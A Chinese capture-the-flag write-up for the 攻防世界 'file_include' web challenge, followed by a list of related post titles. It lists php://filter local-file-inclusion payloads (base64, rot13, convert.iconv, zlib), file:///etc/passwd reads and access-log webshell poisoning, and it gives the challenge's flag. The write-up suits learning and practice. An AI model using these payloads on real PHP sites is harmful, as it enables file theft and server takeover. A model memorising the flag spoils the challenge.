代码审计,存在文件包含,直接上伪协议

发现不行,应该是存在字符过滤

知识盲区:

1.file://协议,需要填写绝对路径,只能读取txt文件,后面直接跟绝对路径。

file:///etc/passwd

2.php://filter

(1)String Filters(字符串过滤器)

php://filter/string.rot13/resource=flag.php //读出以后利用ROT13解码即可php://filter/string.toupper/resource=flag.php //转大写php://filter/string.tolower/resource=flag.php //转小写php://filter/string.strip_tags/resource=flag.php //php标签里所有东西都会被去除,html只有标签会被去除,里面的文字不会删除

(2)Conversion Filters(转换过滤器)

php://filter/convert.base64-encode/resource=flag.php //base64加密读出php://filter/convert.quoted-printable-encode/resource=flag.php 

convert.iconv.*:

用法:

convert.iconv.<input-encoding>.<output-encoding>
or
convert.iconv.<input-encoding>/<output-encoding>

<input-encoding>和<output-encoding> 就是编码方式,有如下几种:

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*

payload:

?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=/var/www/html/flag.php

(3)Compression Filters(压缩过滤器)

payload:

php://filter/zlib.deflate|zlib.inflate/resource=flag.php        //zlib.deflate(压缩)|zlib.inflate(解压)
or
php://filter/bzip2.compress|bzip2.decompress/resource=flag.php   //bzip2.compress(压缩)|bzip2.decompress(解压)

3.包含日志文件,抓包写入一句话木马,进行getshell 日志文件路径:

(1)/var/log/nginx/access.log(2)/var/log/apache2/access_log

4、iconv函数

完成各种字符集间的转换

$string = "XXXX";

iconv("utf8","gbk",$string)  //将字符串string 编码由utf8转变成gbk;

直接访问check.php这个文件里面的内容

/?filename=php://filter/convert.iconv.utf8.utf16/resource=check.php

如果使用括号里面的编码参数会直接提示do not hack!

查看flag.php

注意伪协议里面的编码使用:/?filename=php://filter/convert.iconv.utf8.utf16/resource=flag.php

$flag=cyberpeace{97c7789160615b28e7bb02fc233c4080}

攻防世界-file_include(convert.iconv的使用)相关推荐

  1. 攻防世界-file_include

    题目 访问路径获得源码 <?php highlight_file(__FILE__);include("./check.php");if(isset($_GET['filen ...

  2. 【愚公系列】2023年05月 攻防世界-Web(file_include)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.file_include 1.题目 2.答题 总结 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion ...

  3. 攻防世界杂项(misc)--新手练习区(详解十二道题完结,附件做题过程中使用到的各种工具和网站)

    攻防世界杂项(misc)–新手练习区(详解) 第一题:this_is_flag 题目描述:Most flags are in the form flag{xxx}, for example:flag{ ...

  4. 【愚公系列】2021年11月 攻防世界-进阶题-MISC-025(Miscellaneous-200)

    文章目录 一.Miscellaneous-200 二.答题步骤 1.python 总结 一.Miscellaneous-200 文件:攻防世界下载对应文件 二.答题步骤 1.python 下载附件得到 ...

  5. 攻防世界MISC进阶之misc1

    攻防世界MISC进阶之misc1 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 3星 题目来源: DDCTF-2018 题目描述:d4e8e1f4a0f7e1f3a0e6e1f3 ...

  6. 攻防世界web新手区合集

    攻防世界(xctf)做题合集-get_post- robots-backup-cookie-disabled_button-simple_php-weak_auth-xff_referer-simpl ...

  7. 【ics-05 | mfw】攻防世界CTF题WP

    攻防世界CTF题WP ics-05 所需知识 解题步骤 学习知识 php伪协议(文件包含漏洞中使用) preg_place函数 mfw 所需知识 解题步骤 学习知识 Dirserach工具 GitHa ...

  8. 攻防世界fileclude

    自学的困难,一个题10个没见过的知识点,唉,太难了... ----------------------------------------------------------------------- ...

  9. 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp

    文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...

最新文章

  1. 13_文件的操作模式
  2. 第八课_采购管理、信息与配置管理
  3. python使用input函数时、必须添加提示文字-Python中使用 input 函数来获取输入
  4. SQL 中 left join、right join、inner join 的区别
  5. Android 最新左右可见上下页的banner实现demo
  6. CentOS7 安装Redis Cluster集群
  7. jsf 导航_JSF动作方法导航示例教程– from-action标记
  8. Spring boot 自定义拦截器 获取 自定义注解 信息
  9. Oracle PL/SQL游标的学习
  10. Java实现网上书店管理系统(idea+MySQL+navicat)
  11. 人口logistic模型公式_人口指数增长模型及Logistic模型
  12. 结构梁配筋最牛插件_多高层钢筋混凝土结构最困惑的29个问题及方法解析全汇总...
  13. java 国际化 i18n
  14. STM32单片机和51单片机有何区别?
  15. 开发网页微信登入获取微信用户信息
  16. Python遥感开发之GDAL读写遥感影像
  17. MATLAB - 数字信号包络线的求取
  18. 三维地理信息可视化·城市篇 技术解析
  19. C#正则表达式——中文/英文空格(全角/半角空格)处理
  20. 开发EduSoho v8.7.10 本地播放视频超时或者快进后网络错误导致视频下载中途失败。鉴权播放次数问题

热门文章

  1. 网页设计后PSD时代(Post-PSD Era)
  2. 如何获取iphone的硬件版本以及系统信息
  3. loadrunner12--tree
  4. 为什么中文不能用来编程呢?难道中文比英语差?看完长见识了
  5. 内网穿透渗透小白初级基础(二)之sock5 代理
  6. hdu 5544 Ba Gua Zhen
  7. 【项目精选】基于Java的模拟写字板的设计与实现(视频+论文+源码)
  8. 在项目中用ts封装axios
  9. Cisco实验-VTP基本使用
  10. 第三章 多态(Accp8.0第二学期)